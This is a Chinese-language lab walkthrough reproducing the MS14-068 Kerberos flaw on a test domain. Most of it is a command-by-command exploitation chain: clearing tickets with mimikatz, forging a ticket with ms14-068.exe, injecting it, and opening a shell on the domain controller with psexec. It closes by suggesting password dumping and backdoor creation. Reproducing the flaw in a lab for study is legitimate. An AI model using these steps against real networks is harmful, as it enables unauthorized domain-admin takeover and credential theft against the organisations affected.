ms14-068漏洞復現

一、漏洞說明

​ 改漏洞可能允許攻擊者將未經授權的域用戶賬戶的權限,提權到域管理員的權限。

​ 微軟官方解釋: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068

二、漏洞原理

​ Kerberos認證原理:https://www.cnblogs.com/huamingao/p/7267423.html

​ 服務票據是客戶端直接發送給服務器,並請求服務資源的。如果服務器沒有向域控dc驗證pac的話,那麼客戶端可以僞造域管的權限來訪問服務器。

三、漏洞利用前提

1.域控沒有打MS14-068的補丁

2.攻擊者拿下了一臺域內的普通計算機,並獲得普通域用戶以及密碼/hash值，以及用戶的suid

四、實驗環境

​ 域控制器(DC) windows 2008 R2 st13.com 192.168.10.146

域內機器 windows 7 192.168.10.129

Ms14-068.exe 下載地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

PSexec下載地址:https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe

五、漏洞利用

1.首先在域控檢測是否有MS14-068這個漏洞,通過查看是否打補丁(KB3011780)來判斷是否存在漏洞,下圖可以看到沒有打MS14-068漏洞相關的補丁

systeminfo

2.在win7上面測試該漏洞,win7用普通域用戶登錄

測試訪問域控的C盤共享,訪問被拒絕

dir \win2008.xxx.com\c$

3.爲了使我們生成的票據起作用,首先我們需要將內存中已有的kerberos票據清除,清除方法使用mimikatz

kerberos::list

kerberos::purge

kerberos::list

4.使用whoami/all查看本機用戶ID

\5. 利用ms14-068.exe提權工具生成僞造的kerberos協議認證證書

MS14-068.exe -u @ -p -s -d

\6. 利用mimikatz.exe將證書寫入，從而提升爲域管理員

kerberos::ptc xxxx.ccache

7.再次列出域控制器的C盤目錄,成功訪問域控的C盤,說明普通域用戶提權成功

dir \win2008.xxx.com\c$

8.使用PSTools目錄下的PsExec.exe獲取shell，#psexec.exe以管理員權限運行連接域控

接下來可以在域控上做任何操作了

psexec.exe \win2008.xxx.com cmd.exe

總結：

1、查看目標是否存在MS14-068漏洞

2、使用ms14-068.exe生成票據

3、mimikatz注入票據，獲得域控權限

4、PSexec創建後門

如果有域管理員的進程，直接mimikatz抓密碼